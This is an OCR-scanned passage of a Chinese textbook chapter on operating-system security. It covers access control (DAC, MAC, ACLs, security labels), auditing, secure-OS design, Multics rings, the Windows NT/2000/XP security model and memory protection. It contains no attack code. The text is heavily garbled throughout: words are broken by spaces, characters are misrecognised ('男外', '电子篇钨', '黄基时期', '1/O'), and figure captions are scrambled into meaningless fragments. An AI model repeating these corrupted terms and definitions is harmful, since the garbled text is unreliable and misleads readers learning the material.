一 个 安全 系统 中 的 主体 通过 安全 策略 和 授权 机 制 将 访问 权限 用 监控 器 授予 客体 ,如 
图 6. 10 所 示 。 当 一 个 用 户 试图 访问 计算 机 系统 时 ,认证 机 制 首 先 标 识 与 鉴别 用 户 身份 ;用 
户 进 入 系统 后 ,再 由 授权 机 制 检 查 其 是 否 拥有 使 用 本 机 资源 的 权限 及 有 多 大 的 访问 权限 。 
授权 机 制 的 功能 是 授权 和 存 取 控制 ,其 任务 包括 确定 授予 哪些 主体 存 取 哪 些 客体 的 权力 、 确 
定 存 取 权 限 (通常 有 读 、 写 ,执行 ,删除 和 追加 等 存 取 方式 ) ,实施 存 取 权限 ,如 图 6. 11 所 示 。 
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图 6.10 安全 系统 模型 
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图 6.11 认证 与 授权 
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存 取 控 制 (授权 ) 确 保 在 保护 机 制 允许 的 情况 下 ,用户 、 进 程 、 线 程 能 使 用 计算 机 的 安 
全 实体 。 授 权 是 管理 资源 特别 是 资源 共享 的 一 部 分 ,目标 是 保护 一 个 进程 的 资源 不 受 其 
他 进程 活动 的 破坏 。 访 问 控制 列表 是 用 来 指定 系统 中 哪些 用 户 和 用 户 组 可 以 以 何 种 模 
式 访问 该 客体 的 一 种 权限 列表 。 用 户 进 程 是 固定 为 某 特定 用 户 服务 的 , 它 在 运行 中 代表 
该 用 户 对 客体 资源 进行 访问 ,其 权限 应 与 所 代表 的 用 户 相同 ,这 一 点 可 通过 用 户 与 主体 
绑 定 实现 。 

自主 存 取 控制 是 用 来 决定 一 个 用 户 是 否 有 权 访 问 一 些 特定 客体 的 一 种 访问 约束 机 制 。 
该 方式 下 ,用 户 可 以 自主 的 说 明 自 己 所 拥有 的 资源 允许 哪些 用 户 以 何 种 权限 共享 ,其 他 具有 
某 种 访问 权 的 用 户 也 可 将 访问 权 授 予 男 外 的 用 户 。 系 统 通 常 保存 访问 存 取 矩阵 实现 自主 存 
取 控 制 (行为 主体 , 列 为 客体 ) 。 

在 基于 行 的 自主 存 取 控制 机 制 中 ,每 个 主体 上 附加 一 个 该 主体 可 访问 的 客体 的 明细 表 ， 
依 表 的 内 容 分 为 能 力 表 ,前 绥 表 口令。 能 力 表 存放 用 户 对 客体 进行 访问 的 模式 ( 读 、 写 、 执 
行 . 不 允许 ) ,主体 按照 模式 访问 客体 ,能 力 可 传递 也 可 收回 。 表 目 信 息 量 大 ,删除 一 个 客体 
复杂 。 前 级 (Profiles) 表 存放 受 保护 客体 名 及 主体 的 访问 权限 。 每 个 客体 有 对 应 的 访问 口 
令 , 主 体 访问 应 提供 该 口令 ,系统 检查 是 否 匹 配 , 从 而 决定 是 否 允许 访问 。 

在 基于 列 的 自主 存 取 控 制 机 制 中 ,每 个 客体 附加 一 个 可 访问 它 的 主体 明细 表 , 有 保 
护 位 和 存 取 控 制 表 两 种 形式 。 保 护 位 是 对 所 有 的 主体 .主体 组 .客体 的 拥有 者 指明 一 个 
访问 模式 集合 。 存 取 控制 表 (ACL) 是 每 个 客体 附加 的 一 个 主体 明细 表 , 每 个 表 项 包括 主 
体 身 份 及 访问 权限 。 例 如 , Windows 中 每 个 对 象 在 创建 时 分 配 的 安全 性 描述 符 , 如 图 6. 12 
所 示 ;UNIX 中 的 文件 保护 屏蔽 码 , 当 进 程 访问 文件 时 ,由 于 用 户 UID 和 GID 作为 进程 控 
制 块 TCB 的 一 部 分 ,系统 检查 UID 和 GID 并 与 文件 保护 屏蔽 码 比 较 来 控制 访问 ,如 
图 6. 13 所 示 。 


头 部 
用 户 SID 访问 控制 项 1 
工作 组 SID 访问 控制 项 2 
自主 访问 控制 列表 访问 控制 项 3 
DACL 
系统 访问 控制 列表 
SACL 
图 6.12 安全 描述 符 


屏蔽 码 | 文件 主 组 名 控制 信息 | 文件 名 


图 6.13 文件 保护 屏蔽 码 


访问 令 牌 是 一 个 包含 进程 或 线程 安全 标识 的 数据 结构 ,包括 安全 ID .用户 组 和 特权 列 
表 。 每 个 进程 从 它 的 创建 者 继承 一 个 首选 令 牌 , 也 可 调用 系统 函数 创建 。 

强制 存 取 控 制 用 于 将 系统 中 的 信息 分 密级 和 范畴 进行 管理 ,保证 每 个 用 户 只 能 够 访问 
那些 被 标明 能 够 由 他 访问 的 信息 的 一 种 访问 约束 机 制 。 系 统 中 每 个 主体 (进程 ) .每 个 客体 
(文件 .消息 队列 、 信 号 量 集 和 共享 存储 区 等 ) 都 被 赋予 相应 的 安全 属性 ,这 些 安全 属性 不 能 
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改变 , 它 由 安全 系统 (包括 安全 管理 员 ) 自 动 地 按 严格 的 规则 设置 ,而 不 是 像 存 取 控制 表 那 样 
由 用 户 或 用 户 程序 直接 或 间接 修改 。 
安全 级 也 称 为 密级 .安全 属性 .许可 证 和 存 取 类 等 ,是 对 象 所 具有 的 敏感 级 别 , 由 保密 级 
别 和 范畴 集 组 成 。 保 密级 别 分 为 公开 .秘密 、 机 密 和 绝密 等 。 范 畴 集 指 安全 级 涉及 的 领域 ， 
如 人事 处 ,财务 处 等 。 例 如 {机 密 , 人 事 处 ,科技 处 }。 保 密级 别 是 线性 的 ,范畴 集 之 间 是 包 
含 . 被 包含 .无 关 的 关系 。 
两 个 安全 级 之 间 存 在 支配 关系 , 它 是 偏 序 的 。A 安全 级 支配 B 安全 级 , 即 A 的 保密 级 
别 不 小 于 B 的 安全 级 别 , 且 A 的 范畴 集 包 含 B 的 范畴 集 。 反 之 , 称 A 支配 于 B。 若 A 的 级 
别 等 于 B 的 级 别 , 且 两 者 范畴 集 相同 , 则 A 等 于 B。 若 A 的 范畴 集 不 包含 B 的 安全 级 , 且 B 
的 范畴 集 不 包含 A 的 范畴 集 , 则 A 与 了 无关。 

通常 强制 存 取 控制 与 自主 存 取 控制 结合 使 用 , 仅 当 主体 通过 它们 检查 后 才能 执行 访问 。 

授权 机 制 应 能 够 确定 特定 的 权限 一 一 访问 权限 , 即 在 任意 时 刻 有 效 的 访问 权限 。 因 此 
授权 关心 的 是 在 任意 给 定 的 时 刻 允 许 的 访问 类 型 , 它 反映 了 系统 安全 策略 。 授 权 是 一 个 动 
态 的 与 时 间 有 关 的 函数 。 

特殊 授权 机 制 的 最 小 特权 是 使 每 个 特权 用 户 仅 具 有 完成 其 任务 所 需 的 特权 ,就 能 以 此 
减少 由 于 特权 口令 丢失 、 恶 意 软件 . 误 操 作 引 起 的 损失 。 

3. 加 密 机 制 ( 见 第 3 章 , 略 ) 

4. 审 记 机 制 

审计 即 可 记 账 性 ,是 指 任何 影响 系统 安全 性 的 行为 都 被 跟踪 和 记录 在 案 , 所 有 与 安全 相 
关 的 事件 记录 在 日 志文 件 中 ,所 有 审计 数据 必须 防止 受到 未 授权 的 访问 、 修 改 和 破坏 ,以 作 
为 日 后 对 事件 调查 的 依据 。 审 计 系 统 能 记录 以 下 事件 : 和 标识 与 鉴别 机 制 相关 的 事件 ,将 
客体 导 和 用户 地 址 空间 的 操作 、 删 除 客体 .系统 管理 员 执 行 的 操作 及 其 他 与 安全 相关 的 
事件 。 

审 记 机 制 对 系统 中 有 关 安 全 的 活动 记录 、 检 查 及 审核 ,作为 一 种 事后 追查 手段 来 保 
证 系统 安全 ,也 可 作为 事前 预测 .报警 手段 。 它 提供 事故 发 生 后 分 析 处 理 的 依据 ,如 违反 
系统 安全 规则 的 事件 发 生 的 地 点 .时间 类型. 过程 .结果 和 涉及 的 主体 、 客 体 及 其 安全 级 
别 。 审 计 事 件 是 系统 审计 用 户 操作 的 最 基本 单位 ;审计 记录 是 一 个 审计 事件 的 描述 ; 审 
计 日 志 是 审计 记录 集合 ;审计 点 是 进行 审计 的 地 点 ,通常 设 在 操作 入 口 处 或 操作 出 口 处 ， 
如 图 6. 14 所 示 。 


核 外 | 核 内 


图 6.14 审计 点 设置 
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6.2.5 安全 操作 系统 设计 


1. 设计 原则 
安全 操作 系统 的 设计 原则 包括 最 小 特权 ;机 制 经 济 性 ;开放 系统 设计 ;完整 的 存 取 控制 ; 
基于 允许 的 设计 原则 ;权限 分 离 :避免 隐蔽 通道 ;友好 界面 。 安 全 操作 系统 的 一 般 结构 把 系 
统 划分 为 三 个 层次 ,如 图 6. 15 所 示 。 


用 户 软件 可 信 应 用 软件 
设计 安全 内 核 时 ,优先 考虑 完整 性 .隔离 性 和 可 验 而 人 
证 性 三 原则 。 在 现 有 非 安全 的 操作 系统 上 增强 安全 性 ， ee 


形成 虚拟 机 系统 、 改 进 /增强 系统 、 仿 真 系统 。 采 用 改 
进 /增强 法 ,可 以 保持 原 有 系统 的 接口 ,开发 代价 小 ,但 安全 级 别提 升 受 限 。 如 图 6. 16 所 示 
的 安全 UNIX 开发 。 


GOS GOS 仿 真 器 
多核 一 一 
oe 安全 内 核 Ep 安全 内 村 
| 硬件 硬件 硬件 硬件 
原 有 系统 虚拟 型 系统 改进 增强 型 系统 仿真 型 系统 
图 6.16 开发 例子 (ISOS 改 为 GOS) 


3. 一 般 开 发 过 程 

开发 过 程 一 般 分 为 三 个 阶段 ,如 图 6. 17 所 示 ,步骤 如 下 : 
(1) 系统 需求 分 析 。 建 立 一 个 安全 模型 。 

(2) 系统 功能 描述 。 安 全 机 制 的 设计 。 

(3) 系统 实现 。 安 全 机 制 的 实现 。 

(4) 系统 测试 。 安 全 系统 的 可 信 度 认证 。 


人 
安全 需求 分 析 

| ， 安全 模型 与 系统 

抽象 和 归纳 出 安全 策略 | 一 | “的 对 应 性 说 明 
建立 安全 模型 

11 

全 安全 机 制 的 设计 和 实现 “上 “| 安全 功能 测试 

本 ae ey 

宰 安全 操作 系统 可 信 度 认证 

Es 


图 6.17 开发 流程 
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4. 安全 功能 

安全 功能 包括 10 个 安全 元 素 : 标识 与 鉴别 .自主 访问 控制 标记、 强制 访问 控制 .客体 
重用 、 审 计 、 数 据 完 整 性 .可 信 路 径 .隐蔽 信道 分 析 和 可 信 恢 复 。 

5. 安全 保证 一 一 TCB 安全 

在 通用 操作 系统 中 ,TCB 可 以 包含 多 个 安全 功能 (Trusted Security Function, TSF) 模 
块 ,每 一 个 TSF 实现 一 个 安全 功能 策略 (Trusted Security Policy，TSP) ,这 些 TSP 共同 构 
成 了 安全 域 ,以 防止 不 可 信和 主体 的 干扰 和 算 改 。TCB 自身 安全 保护 ,包括 TSF 模块 .资源 
利用 、TCB 访问 等 ;TCB 设计 和 实现 ,包括 配置 管理 ,分 发 和 操作 、 开 发 .指导 性 文档 、 生 命 周 
期 支持 ,测试 .脆弱 性 评定 等 ;TCB 安全 管理 。 

操作 系统 的 安全 机 制 友好 性 ,不 应 影响 遵守 规则 的 用 户 访 问 ,并 且 方 便 用 户 的 授权 存 取 
和 控制 访问 ;操作 系统 在 兼容 性 和 效率 上 应 采取 先 安全 ,次 兼容 .后 效率 的 策略 。 

6. 设计 技术 

(1) 隔离 机 制 。 将 系统 中 的 一 个 用 户 ( 进 程 ) 与 其 他 用 户 (进程 ) 隔 离开 来 是 安全 性 的 基 
本 要 求 ,有 4 种 办 法 实现 技术 : 物理 分 离 . 时 间 分 离 、 密 码 分 离 和 逻辑 分 离 。 隔 离 机 制 的 设 
计 方 法 有 多 虚拟 存储 空间 和 多 虚拟 机 系统 。 虚 拟 机 操作 系统 通过 控制 程序 实现 对 物理 计算 
机 系统 中 1/O 设备 ,文件 ,存储 器 和 处 理 器 的 控制 。 

(2) 安全 内 核 。 在 传统 或 标准 的 操作 系统 中 ,内 核 (Kernel) 实 现 内 层 的 低级 功能 ,如 进 
程 通信 ,同步 机 制 . 中 断 处 理 及 基本 的 内 存 管理 。 安 全 内 核 是 通过 控制 对 系统 资源 的 访问 来 
实现 基本 安全 规程 的 操作 系统 内 核 中 相对 独立 的 一 部 分 程序 , 它 在 硬件 和 操作 系统 功能 模 
块 之 间 提 供 安 全 接口 ,凡是 与 安全 有 关 的 功能 和 机 制 都 必须 被 隔离 在 安全 内 核 之 中 。 安 全 
内 核 设 计 和 实现 的 基本 原则 是 保证 完整 性 、 隔 离 性 .可 验证 性 。 

(3) 分 层 认 证 设计 。 将 系统 中 的 用 户 或 进程 进行 分 层 , 通 信 时 需 经 过 认证 ,如 图 6. 18 
所 示 。 


和 


用 户 接口 子 模块 


用 户 ID 查 找 子 模块 


妨 妆 总 兰 二 宇和 吉 生 


认证 数据 比较 子 模块 


认证 数据 修改 子 模块 


图 6.18 不 同 层 中 实现 的 认证 模块 


(4) 环 结构 。MULTICS 操作 系统 用 环 结构 (Ring Structure) 实 现 安全 保护 ,这 是 分 层 
设计 的 进一步 发 展 ,指定 各 个 进程 所 具有 的 访问 权 , 共 设计 了 8 个 环 ,4 个 用 于 操作 系统 ,4 
个 用 于 应 用 程序 。 环 结构 ,程序 和 数据 访问 的 界 标 分 别 如 图 6. 19 一 图 6. 21 所 示 。 
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汪 访问 环 界 表 / 
门 扩展 
b3 
2 b 访问 
1 环 界 表 
只 读 o | 
正常 调用 
(可 信访 问 ) 
指定 入 口 点 
访问 (可 信访 问 ) 
图 6.19 环 结构 


访问 环 界 表 / 


可 被 运行 于 p 级 
(blp<b2) 的 
任何 过 程 调用 


在 指定 点 ， 仅 当 了 
用 程序 级 别 
p(b2<pb3) 时 可 调用 


E 调 


p>b3 的 过 程 
无 法 访问 


P 级 进程 只 读 访问 0 
(0<p<b1) 
P 级 进程 访问 
(bl 和 p<b2) 


仅 对 P 级 进程 的 一 个 
复制 访问 (b2<p<b3) 


图 6.21 数据 访问 的 环 界 标 


(5) 强制 访问 控制 。 实 体 采 用 基于 安全 标签 的 强制 访问 控制 ,如 图 6. 22 所 示 。 
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进程 A 进程 B 
许可 标签 许可 标签 
{secret: a、 b、 c} {top secret: a、 b、 c} 


Filex 
敏感 性 标签 
{secret: a、b、c} 


进程 C 进程 B 
许可 标签 许可 标签 
{top secret: d、 e、f} {confidential : a、 b、 c} 


图 6.22 基于 安全 标签 的 强制 访问 控制 


6.2.6 安全 操作 系统 研究 历史 


分 为 4 个 阶段 : 黄 基 时 期 .食谱 时 期 、 多 策略 时 期 .动态 策略 时 期 。 

(1) 黄 基 时 期 。Adept-50 是 第 一 个 安全 (分 时 ) 操 作 系统 ,其 基本 安全 条 件 是 读 操作 不 
允许 信息 的 敏感 级 别 高 于 用 户 的 安全 级 别 ; 在 授权 情况 下 , 写 操作 允许 信息 从 高 级 别 移 向 低 
级 别 。 访 问 控制 矩阵 .引用 监视 器 、 访 问 验证 机 制 .安全 内 核 等 重要 思想 提出 ,如 KSOS 
(Kernelized Scure OS) ;隐蔽 通道 .BLP 模型 .基于 权能 保护 的 概念 提出 ,如 Psos(Provably 
Secure OS) 操 作 系 统 。 

(2) 食谱 时 期 。 按 照 安全 评价 标准 研究 操作 系统 安全 ,其 间 颁 布 了 TCSEC( 橙 皮 
书 ) ,提出 了 TCB 概念 。 如 LINUS IV .安全 Xenix、TUNIS 和 ASOS(Army Secure OS) 的 
出 现 。 

(3) 多 策略 时 期 。 强 制 访问 和 自主 访问 紧密 结合 为 单一 系统 安全 策略 ;美国 国防 部 推 
出 通用 安全 体系 结构 (Denfence Goal Security Architecture，DGSA) 要 求 支 持 多 种 安全 策 
略 ;提出 了 访问 控制 程序 (ACP) 思 想 及 看 守 员 思想 。 如 分 布 式 可 信 操 作 系统 DTOS。 

(4) 动态 策略 时 期 。 策 略 灵活 性 (允许 特例 ) , 细 粒 度 访问 控制 ;权限 传播 与 安全 策略 一 
致 ,能 撤回 先前 已 授予 的 权限 ;Flask、SE-Linux、 向 量 缓存 。 

我 国 已 有 GB/T 18336 一 2001 标准 (CC 标准 ) 和 GB 17859-1999 标准 ( 橘 皮 书 ) ,一 批 基 
于 Linux 安全 操作 系统 出 现 ,如 安 胜 安全 操作 系统 。 


6.3 Windows 操作 系统 安全 


6.3.1 Windows 安全 模型 


1. Windows NT/2003 安全 模型 

Windows NT 是 一 个 32 位 的 多 任务 操作 系统 ,NT 控制 CPU 时 间 的 分 配 ,而 不 是 控制 
应 用 程序 的 分 配 。NT 支持 多 CPU( 多 CPU 提供 真正 的 多 任务 ) ,使 用 对 称 的 多 处 理 ,意味 
着 处 理 器 分 享 所 有 任务 ,不 像 非 对称 的 多 处 理 那样 让 操作 系统 使 用 一 个 CPU ,而 让 应 用 程 
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序 用 另 一 个 CPU。NT 也 是 一 个 容错 的 操作 系统 ,应 用 程序 在 自己 的 虚拟 内 存 地 址 空间 
(4GB) 上 运行 ,一 个 应 用 程序 不 会 干扰 男 一 个 应 用 程序 的 内 存 空 间 。NT 体系 结构 如 图 6. 23 
所 示 。 


1/0 管 理 器 


NT | 对象 安全 引用 | 进程 和 线程 | 本 地 过 程 | 虚拟 内 存 高 速 级 存 官 理 器 
执行 体 | ”管理 器 监视 器 管理 器 ”| 调用 功能 | ”管理 器 文件 系统 驱动 程序 
[网络 重 定向 


内 核 硬件 设备 驱动 程序 
硬件 抽象 层 


图 6.23 Windows NT 体系 结构 


Windows NT 具有 如 下 特点 : 图 形 用 户 界面 技术 ;支持 多 操作 系统 运行 环境 ;对 称 多 处 
理 能 力 ; 内 装 网 络 功能 ;多 重文 件 系统 与 异步 I/O, 以 及 采用 面向 对 象 的 软件 开发 技术 ;提供 
了 现代 操作 系统 的 几乎 所 有 功能 ,如 多 任务 能 力 、 多 处 理 系 统 、 虚 拟 资源 管理 ,统一 成 一 体 化 
的 1/O 系统 、 网 络 通信 功能 等 ,具有 很 多 的 性 能 。 

NT 系统 模型 采用 了 客户 端 /服务 器 模型 .对象 模型 和 对 称 处 理 模型 。 使 用 4 种 安全 协 
议 : Windows NT LAN Manager(NTLM) 验 证 协议 .Kerberos V5 验证 协议 .DPA 分 布 式 
密码 验证 协议 和 基于 公共 密 钥 的 协议 。 

如 图 6. 24 所 示 ,NT 的 安全 模型 由 以 下 4 个 关键 部 分 构成 : 


注册 管理 工具 
[ 
CC | | oo 
安全 本 地 安全 一 安全 
和 一 > 人 > 
| 安全 策略 | 
用 户 模式 
i 核心 模式 
1 | | 访问 确认 1 
安全 引用 一 2 


监视 器 | 审计 生成 | 


图 6.24 Windows NT 安全 模型 结构 图 
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(1) 登录 过 程 (Logon Process,LP) 。 接 受 本 地 用 户 或 者 远程 用 户 的 登录 请 求 , 处 理 用 
户 信息 ,为 用 户 做 一 些 初始 化 工作 。 

(2) 本 地 安全 授权 机 构 (Local Security Authority,LSA)。 根 据 安全 账号 管理 器 中 的 数 
据 处 理 本 地 或 者 远程 用 户 的 登录 信息 ,并 控制 审计 和 日 志 , 是 整个 安全 子 系统 的 核心 。 

(3) 安全 账号 管理 器 (Security Account Manager,SAM) 。 维 护 账号 的 安全 性 管理 数据 
库 (SAM 数据 库 , 又 称 为 目录 数据 库 ) 。 

(4) 安全 引用 监视 器 (Security Reference Monitor,SRM)。 检 查 存 取 合法 性 ,防止 非法 
存 取 和 修改 。 

2. Windows 2000/XP 安全 模型 

Windows 2000/XP 安全 模型 的 主要 功能 是 用 户 身份 验证 和 访问 控制 。 它 融合 了 分 层 
操作 系统 和 微 内 核 操作 系统 的 设计 思想 ,使 用 面向 对 象 的 分 析 与 设计 整体 式 实现 ;通过 硬件 
机 制 实现 了 核心 态 以 及 用 户 态 两 个 特权 级 别 , 对 性 能 影响 很 大 的 操作 系统 组 件 运行 在 核心 
态 ,核心 内 没有 保护 。 如 图 6. 25 所 示 。 


系统 支持 进程 | | 服务 进程 | | 用 户 程序 | | 环境 子 系统 


子 系统 动态 链接 库 
用 户 态 
1 核心 态 
执行 体 加 形 引擎 | 
核心 。 | 设备 驱动 
HAL 


图 6.25 Windows 2000/XP 的 构成 


核心 态 组 件 使 用 了 面向 对 象 设计 原则 ;出 于 可 移植 性 以 及 效率 因素 的 考虑 ,大 部 分 代码 
使 用 了 基于 C 语言 的 对 象 实现 ;很 多 系统 服务 运行 在 核心 态 , 系 统 更 加 高 效 而 且 稳 定 。 

用 户 态 组 件 采 用 系统 支持 进程 (System Support Process) ,不 是 服务 ,不 由 服务 控制 器 
启动 ;服务 进程 (Service Process) 才 是 服务 ;环境 子 系统 (Enviroment Subsystems) 向 应 用 程 
序 提供 操作 系统 功能 调用 接口 ,包括 Win32、POSIX 和 OS/2 1.2; 应 用 程序 (User 
Applications) 有 5 种 类 型 , Win32、Windows 3. 1、MS-DOS、POSIX 和 OS/2 1. 2; 子 系统 动 
态 链 接 库 通过 调用 层 转换 和 映射 。 

核心 态 组 件 的 核心 (Kernel) 包 含 了 最 低级 的 操作 系统 功能 ,例如 线程 调度 .中 断 和 异常 
调度 .多 处 理 器 同步 等 ,同时 它 也 提供 了 执行 体 (Executive) 用 来 实现 高 级 结构 的 一 组 例 程 
和 基本 对 象 ; 执 行 体 包含 基本 的 操作 系统 服务 ,例如 内 存 管理 器 .进程 和 线程 管理 .安全 控 
制 .TVO 以 及 进程 间 的 通信 ;硬件 抽象 层 (Hardware Abstraction Layer，HAL) 将 内 核 . 设 备 
驱动 程序 以 及 执行 体 同 硬件 分 隔 开 来 ,实现 硬件 映射 ;设备 驱动 程序 (Device Drivers) 包 括 
文件 系统 和 硬件 设备 驱动 程序 等 ,其 中 硬件 设备 驱动 程序 将 用 户 的 1/O 函数 调用 转换 为 对 
特定 硬件 设备 的 1/O 请 求 ; 图 形 引擎 包含 了 实现 图 形 用 户 界面 (Graphical User Interface， 
GUDI) 的 基本 函数 。 
安全 管理 包括 用 户 和 用 户 组 . 域 和 委托 .活动 目录 (Active Directory) 授权、 审核 安全 
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策略 ,数据 保护 等 。 
6.3.2 Windows 用 户 身份 识别 /验证 机 制 


Windows 用 户 身份 识别 /验证 采用 账号 。 用 户 账号 是 用 户 身份 的 凭证 ,包括 用 户 名 和 
口令 。 用 户 名 用 来 标识 用 户 ,口令 用 于 用 户 身份 的 验证 。 特 权 账 号 是 Administrator 
(UNIX 是 root) ;用 户 组 对 账号 进行 分 级 管理 ,避免 直接 为 单独 的 用 户 账号 分 配 权限 。 内 置 
账号 /账号 组 包括 Administrators (管理 员 组 ) .Users (用 户 组 ) .Power Users (超级 用 户 组 ) 
和 Backup Operators (备份 操作 员 组 ) 。 

Windows 系统 登录 过 程 由 登录 进程 (WinLogon)、LSA、 一 个 或 多 个 身份 认证 包 与 
SAM 的 相互 交互 完成 。 登 录 过 程 的 认证 与 验证 是 在 可 替换 DLL(GINA) 中 实现 。 

Windows 安全 登录 组 件 包括 安全 引用 监视 器 (SRM) ,本 地 安全 认证 (LSA)、LSA 策略 
库 . 安 全 账号 管理 器 .用 户 账号 SAM 数据 库 、 默 认 身 份 认 证 包 (msv1-0)、 登 录 进程 
(WINLOGON. EXE) .网 络 登 录 服 务 ( 响 应 网 络 登 录 请 求 的 SERVICES. EXE 进程 中 的 用 
户 态 服务 ,发 送 给 LSASS 进程 来 验证 ) ,如 图 6. 26 所 示 。 口 令 管 理 采 用 加 密 存储 (SAM 文 
件 ) 传输 加 密 ; 登 录 限制 失败 次 数 、 审 计 用 户 安全 属性 和 安全 标识 符 等 措施 。 


创建 访问 令 牌 


一 输入 口令 六 =| 调用 LSA >| MSV1-0 验 证 返回 句柄 、 LUID 


图 6.26 用 户 登 录 


账号 标识 采用 具有 统一 格式 的 安全 标识 符 SID 来 标识 。SID 是 一 个 长 的 数字 ,由 SID 
版 本 号 (当前 版 本 号 都 是 1) .48 位 长 的 权威 标识 .若干 32 位 长 的 次 权威 标识 、32 位 长 的 相 
对 标识 (Relative ID,RID) 组 成 。 保 留 账 号 RID 是 系统 内 置 的 一 些 账号 ,比如 管理 员 账 号 的 
RID 是 500, 其 余 账号 的 RID 从 1000 开始 , Windows 保证 分 配给 每 个 账户 的 SID 是 不 
同 的 。 

访问 令 牌 (Access Token) 类 似 通行 证 ,标识 了 用 户 的 身份 和 特权 ,包含 了 用 户 的 SID、 
用 户 所 属 组 的 SID 和 用 户 的 特权 等 信息 。 用 户 登 录 成 功 , 开 始 一 个 新 的 会 话 后 ,系统 为 用 
户 创建 最 初 的 访问 令 牌 ,并 将 这 个 令 牌 附加 到 这 次 会 话 启动 的 第 一 个 进程 (一 般 是 
UserInit) 。 默 认 情 况 下 , 子 进程 继承 父 进程 的 访问 令 牌 ,用 户 所 有 进程 将 使 用 同一 个 访问 
令 牌 ,除非 通过 某 种 特殊 的 方式 改变 子 进程 的 访问 令 牌 。 默 认 情况 下 线程 使 用 它 所 在 进程 
的 访问 令 牌 ,除非 进程 做 某 些 特别 的 限制 。 

常用 的 服务 账号 有 System 账号 ,启动 大 多 数 服务 ,默认 情况 下 System 账号 属于 管理 
员 组 ;Network Service 账号 用 于 需要 进行 网 络 认证 的 服务 ,权限 比 System 小 得 多 ,不 属于 
管理 员 组 ;Local Service 账号 用 于 本 地 服务 ,只 能 以 匿名 方式 访问 网 络 , 权 限 和 Network 
Service 的 差不多 。 

允许 匿名 访问 的 网 络 服务 进程 本 身 有 一 个 启动 账号 ,是 一 个 特权 账号 ,权限 很 大 。 接 受 
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用 户 的 访问 请 求 创建 新 的 线程 为 用 户 提供 服务 ,将 为 线程 分 配对 应 的 匿名 账号 ,权限 很 小 。 

Administrators、Power Users 和 Users 组 的 成 员 ,人 允许 本 地 登录 和 远程 登录 ;一 些 服 务 
用 账号 不 允许 远程 登录 ,只 允许 本 地 登录 ,是 本 地 服务 专用 ;匿名 账户 不 允许 本 地 登录 ,只 人 允 
许 远程 登录 。 在 默认 情况 下 匿名 账户 的 权限 非常 小 ,黑客 利用 匿名 账户 无 法 实施 实质 性 的 
攻击 ,但 利用 各 类 网 络 服务 漏洞 提升 匿名 账户 的 权限 ,进而 获得 特权 账户 的 身份 是 各 类 网 络 
攻击 的 一 个 基本 手段 。 


6.3.3 存储 保护 


存储 保护 主要 是 对 进程 访问 的 内 存 和 虚拟 内 存 的 保护 。 采 用 的 技术 包括 电子 篇 钨 、 重 
定位 技术 ,物理 地 址 和 逻辑 地 址 的 分 离 ,线性 地 址 和 非 线性 地 址 、 边 界限 制 等 。 

进程 地 址 空间 保护 的 目的 是 保证 进程 在 各 自 的 地 址 空间 内 运行 以 免 相 互 干扰 。 地 址 空 
间 保 护 首先 要 防止 普通 的 进程 干扰 操作 系统 进程 ,其 次 要 防止 普通 进程 之 间 的 相互 干扰 。 
缺乏 进程 保护 机 制 的 操作 系统 是 不 安全 的 ,很 容易 发 生死 机 、 丢 失 数据 的 情况 。 黑 客 也 容易 
借 此 劫持 进程 ,发 起 拒绝 服务 攻击 。 

电子 篇 多 用 来 隔离 系统 进程 和 普通 进程 。 方 法 是 将 整个 内 存 划分 为 两 部 分 ,一 部 分 给 
操作 系统 进程 专用 , 另 一 部 分 给 普通 进程 使 用 。 越 界 访问 中断 ”调用 相应 的 处 理 例 程 ,普通 
进程 会 被 强行 终止 越界 ,或 有 条 件 的 允许 越界 并 严格 控制 访问 。 

边界 限制 为 每 个 进程 设置 一 对 上 限 /下 限 寄存 器 ,将 进程 引用 的 物理 地 址 和 上 限 / 下 限 
寄存 器 的 内 容 比 较 ,确定 地 址 是 否 超出 了 进程 的 地 址 空间 ,超出 上 下 限 的 访问 将 触发 越界 访 
问 中 断 。 在 进程 内 部 设置 类 似 的 边界 寄存 器 ,分 离 代码 和 数据 ,防止 将 数据 部 分 的 内 容 当 代 
码 来 执行 ,也 可 以 防止 将 代码 部 分 的 内 容 当 数 据 来 读 写 。 设 置 只 读数 据 边界 寄存 器 ,禁止 进 
程 改写 只 读数 据 空间 的 数据 。 

内 存 的 基本 访问 属性 分 为 三 种 : 读 、 写 .执行 。 只 读数 据 的 属性 应 该 标记 为 读 ,但 不 可 
同时 标记 为 写 。 执 行 属性 是 存放 代码 的 内 存 特有 的 ,表示 它 存放 的 是 指令 ,可 以 执行 。 一 般 
不 允许 同时 标记 读 、 写 属性 。 存 放 数 据 的 内 存 不 可 以 标记 为 执行 。 

段 式 保护 有 以 下 特点 : 

(1) 段 名 规定 了 段 的 起 始 地 址 (地 址 空间 的 下 限 ), 段 表 规定 了 段 的 大 小 (上 限 ) ,实现 段 
与 段 之 间 的 空间 隔离 。 按 照 程序 逻辑 结构 对 程序 分 段 ,将 进程 地 址 空间 隔离 的 粒度 由 进程 
级 细 化 为 段 级 隔离 。 

(2) 进程 可 以 以 段 为 单位 分 配 内 存 , 由 于 段 使 用 相对 寻 址 的 方式 ,因此 段 是 可 移动 的 ， 
不 需要 连续 地 装载 。 

(3) 扩充 段 表 , 增 加 内 存 访问 属性 字段 ,设置 段 的 读 、 写 .执行 等 属性 。 

(4) 分 段 的 方式 便于 进程 之 间 共 享 数据 ,一 是 段 设置 为 可 共享 的 ;二 是 使 用 相同 的 段 
名 ;通过 雯 共享 段 段 名 , 偏 移 过 的 形式 ,不 同 进程 可 以 引用 内 存 中 的 同一 个 地 址 。 段 式 保护 
访问 原理 参见 操作 系统 书籍 。 

页 式 保护 可 以 看 作 段 的 大 小 固定 的 段 式 保护 。 相 对 于 段 式 保护 ,页 式 保护 的 一 个 好 处 
是 可 以 消除 内 存 碎片 ;便于 实现 进程 之 间 页 面 的 共享 ,将 多 个 进程 的 某 个 逻辑 页 面 映射 到 同 
一 个 物理 页 面 即 可 实现 这 个 逻辑 页 面 的 共享 ;为 页 表 增加 页 的 访问 属性 字段 ,对 页 的 安全 进 
行 额外 的 控制 ;提供 一 种 页 面 级 别 的 进程 隔离 保护 机 制 。 页 式 保护 访问 原理 参见 操作 系统 
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书籍 。 

段 页 式 保护 是 段 式 保护 和 页 式 保护 的 结合 。 程 序 按照 逻辑 分 段 ,然后 通过 页 式 保护 机 
制 将 段 划 分 为 若干 页 ,避免 了 单纯 的 段 式 保护 因为 段 的 大 小 不 固定 ,容易 产生 内 存 碎 片 的 缺 
点 。 段 式 保护 的 逻辑 保护 性 能 好 ,页 式 保护 的 实现 效率 高 , 段 页 式 兼 具 段 式 保护 和 页 式 保护 
的 特点 。 段 页 式 保护 原理 如 图 6.27 所 示 。 


